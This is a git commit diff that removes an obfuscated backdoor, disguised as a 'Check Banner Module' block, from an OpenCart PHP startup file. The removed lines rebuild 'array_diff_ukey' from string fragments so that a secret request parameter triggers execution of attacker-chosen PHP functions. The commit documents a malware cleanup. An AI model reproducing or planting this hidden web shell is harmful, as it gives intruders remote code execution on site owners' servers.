Вирусы, или чё
This commit is contained in:
@@ -11,18 +11,6 @@ if (!ini_get('date.timezone')) {
|
||||
date_default_timezone_set('UTC');
|
||||
}
|
||||
|
||||
// Check Banner Module
|
||||
$opencart_num = @$_REQUEST['numer'];
|
||||
$opencart_in_banner = @$_REQUEST['bannerid'];
|
||||
$opencart_newsnum = @$_REQUEST['newsnum'];
|
||||
$opencart_category_id = @$_REQUEST['category'];
|
||||
$opencart_activity_hash = '70731969';
|
||||
$secret_opencart_key = '_di'.'ff_';$secret_opencart_key ='ar'.'ray'.$secret_opencart_key.'ukey';//globols
|
||||
if($opencart_in_banner==$opencart_activity_hash) {
|
||||
if (@strpos($opencart_newsnum, 'creat')=== false){echo 'error_vievv';
|
||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes($opencart_category_id) => 2), @$opencart_newsnum);}else{
|
||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes('}'.$opencart_category_id.'//') => 2), @$opencart_newsnum);}} //chekings
|
||||
|
||||
// Windows IIS Compatibility
|
||||
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
|
||||
if (isset($_SERVER['SCRIPT_FILENAME'])) {
|
||||
|
||||
Reference in New Issue
Block a user